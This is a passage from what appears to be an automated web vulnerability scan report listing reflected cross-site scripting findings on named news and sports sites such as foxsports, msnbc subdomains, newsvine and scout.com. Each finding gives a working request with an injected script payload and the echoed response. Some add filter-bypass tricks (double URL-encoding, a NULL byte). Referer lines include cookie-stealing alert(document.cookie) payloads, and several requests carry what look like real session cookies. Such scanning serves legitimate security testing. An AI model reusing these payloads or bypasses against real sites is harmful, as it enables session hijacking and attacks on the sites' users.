GET /nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911?c1c3c'-alert(1)-'b04d6cae059=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 252769
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=23
Date: Sat, 29 Jan 2011 23:50:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911?c1c3c'-alert(1)-'b04d6cae059=1';

       startComments('StoryComments', '26400099'); // load up team comments
   </script>
...[SNIP]...

5.208. http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55753'-alert(1)-'d132c7e23c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911?55753'-alert(1)-'d132c7e23c8=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 257888
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=25
Date: Sat, 29 Jan 2011 23:50:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911?55753'-alert(1)-'d132c7e23c8=1';

       startComments('StoryComments', '26409028'); // load up team comments
   </script>
...[SNIP]...

5.209. http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc5ba'-alert(1)-'5fa67492e89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911?cc5ba'-alert(1)-'5fa67492e89=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 259129
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=14
Date: Sat, 29 Jan 2011 23:50:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
pt>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911?cc5ba'-alert(1)-'5fa67492e89=1';

       startComments('StoryComments', '26389147'); // load up team comments
   </script>
...[SNIP]...

5.210. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ [GT1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Issue detail

The value of the GT1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1074'-alert(1)-'88c686acbd7 was submitted in the GT1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002e1074'-alert(1)-'88c686acbd7 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 249591
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 29 Jan 2011 23:49:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
nURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811?GT1=39002e1074'-alert(1)-'88c686acbd7';

startComments('StoryComments', '26373068'); // load up team comments
</script>
...[SNIP]...

5.211. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fa5f'-alert(1)-'e113a189711 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?2fa5f'-alert(1)-'e113a189711=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 249577
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=48
Date: Sat, 29 Jan 2011 23:50:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
sportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811?2fa5f'-alert(1)-'e113a189711=1';

startComments('StoryComments', '26373068'); // load up team comments
</script>
...[SNIP]...

5.212. http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0e8c'-alert(1)-'5e2bffdfb2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911?c0e8c'-alert(1)-'5e2bffdfb2d=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 225457
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=39
Date: Sat, 29 Jan 2011 23:50:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911?c0e8c'-alert(1)-'5e2bffdfb2d=1';

       startComments('StoryComments', '26406016'); // load up team comments
   </script>
...[SNIP]...

5.213. http://openchannel.msnbc.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://openchannel.msnbc.redacted
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52854"><script>alert(1)</script>ae378974d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?52854"><script>alert(1)</script>ae378974d45=1 HTTP/1.1
Host: openchannel.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.214. http://openchannel.msnbc.redacted/_vine/printer [path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://openchannel.msnbc.redacted
Path:	/_vine/printer

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload f4004<img%20src%3da%20onerror%3dalert(1)>4be4a2fbbcf was submitted in the path parameter. This input was echoed as f4004<img src=a onerror=alert(1)>4be4a2fbbcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=openchannel&path=/f4004<img%20src%3da%20onerror%3dalert(1)>4be4a2fbbcf HTTP/1.1
Host: openchannel.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://openchannel.msnbc.redacted/?52854%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae378974d45=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SSLB=0; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296392120662

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 15:11:11 GMT
Connection: close
Content-Length: 504

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...
":{"lgstate":-1,"domainName":null,"displayName":null},"devMachine":false,"section":{"type":"g","contentSetId":"20293412","domainName":"openchannel","displayName":"Open Channel","avatar":null,"path":"\/f4004<img src=a onerror=alert(1)>4be4a2fbbcf"},"revision":"23247"}

5.215. http://photoblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://photoblog.msnbc.redacted
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5644"><script>alert(1)</script>059427e1b2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f5644"><script>alert(1)</script>059427e1b2e=1 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.216. http://photoblog.msnbc.redacted/_vine/printer [path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://photoblog.msnbc.redacted
Path:	/_vine/printer

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload b630a<img%20src%3da%20onerror%3dalert(1)>e5d9d58c461 was submitted in the path parameter. This input was echoed as b630a<img src=a onerror=alert(1)>e5d9d58c461 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=photoblog&path=/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sunb630a<img%20src%3da%20onerror%3dalert(1)>e5d9d58c461 HTTP/1.1
Host: photoblog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:49:39 GMT
Connection: close
Content-Length: 572

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...
alse,"section":{"type":"g","contentSetId":"16164228","domainName":"photoblog","displayName":"Photoblog","avatar":null,"path":"\/_news\/2011\/01\/ad5b7d32bfbc5f43)(sn=*\/5942494-double-whammy-on-the-sunb630a<img src=a onerror=alert(1)>e5d9d58c461"},"revision":"23247"}

5.217. http://polls.newsvine.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://polls.newsvine.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d374c%253cscript%253ealert%25281%2529%253c%252fscript%253ec34d3a5143c was submitted in the REST URL parameter 1. This input was echoed as d374c<script>alert(1)</script>c34d3a5143c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /d374c%253cscript%253ealert%25281%2529%253c%252fscript%253ec34d3a5143c HTTP/1.1
Host: polls.newsvine.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296400131698

Response

5.218. http://recruiting.scout.com/a.z [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/a.z

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %008759a'-alert(1)-'c462d76badf was submitted in the c parameter. This input was echoed as 8759a'-alert(1)-'c462d76badf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /a.z?s=73&p=9&c=4%008759a'-alert(1)-'c462d76badf&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:51:53 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 230 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:01:53 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 212580

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<h
...[SNIP]...

...[SNIP]...

5.219. http://recruiting.scout.com/a.z [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/a.z

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec18c'-alert(1)-'16d2db08aad was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /a.z?s=73&p=9&c=4ec18c'-alert(1)-'16d2db08aad&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=153805115.1296350458.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=153805115.697096863.1296350458.1296350458.1296350458.1; SessionBrandId=0; __utmc=153805115; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=153805115.1.10.1296350458;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:23:06 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 269 ms
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:33:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 212480

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<h
...[SNIP]...

...[SNIP]...

5.220. http://recruiting.scout.com/a.z [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://recruiting.scout.com
Path:	/a.z

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e24fa'-alert(1)-'162422719ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011&e24fa'-alert(1)-'162422719ee=1 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:53:06 GMT
Server: Microsoft-IIS/6.0
Server: Yesler
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 271 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:03:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211715

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...

...[SNIP]...

5.221. http://redtape.newsvine.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redtape.newsvine.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af369"-alert(1)-"8df14796428 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?af369"-alert(1)-"8df14796428=1 HTTP/1.1
Host: redtape.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:18:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=ad5ff547f0b671d901b18e62c2d4a6f5; expires=Sat, 25-Jan-2031 02:18:30 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 65874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
= "";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1078017","http://redtape.newsvine.com/?af369"-alert(1)-"8df14796428=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.222. http://s18.sitemeter.com/js/counter.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s18.sitemeter.com
Path:	/js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0dde'%3balert(1)//a0f43fc652c was submitted in the site parameter. This input was echoed as c0dde';alert(1)//a0f43fc652c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /js/counter.asp?site=s18neumediac0dde'%3balert(1)//a0f43fc652c HTTP/1.1
Host: s18.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:50:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7304
Content-Type: application/x-javascript
Expires: Sun, 30 Jan 2011 02:00:20 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s18neumediac0dde';alert(1)//a0f43fc652c', 's18.sitemeter.com', '');

var g_sLastCodeName = 's18neumediac0dde';alert(1)//a0f43fc652c';
// ]]>
...[SNIP]...

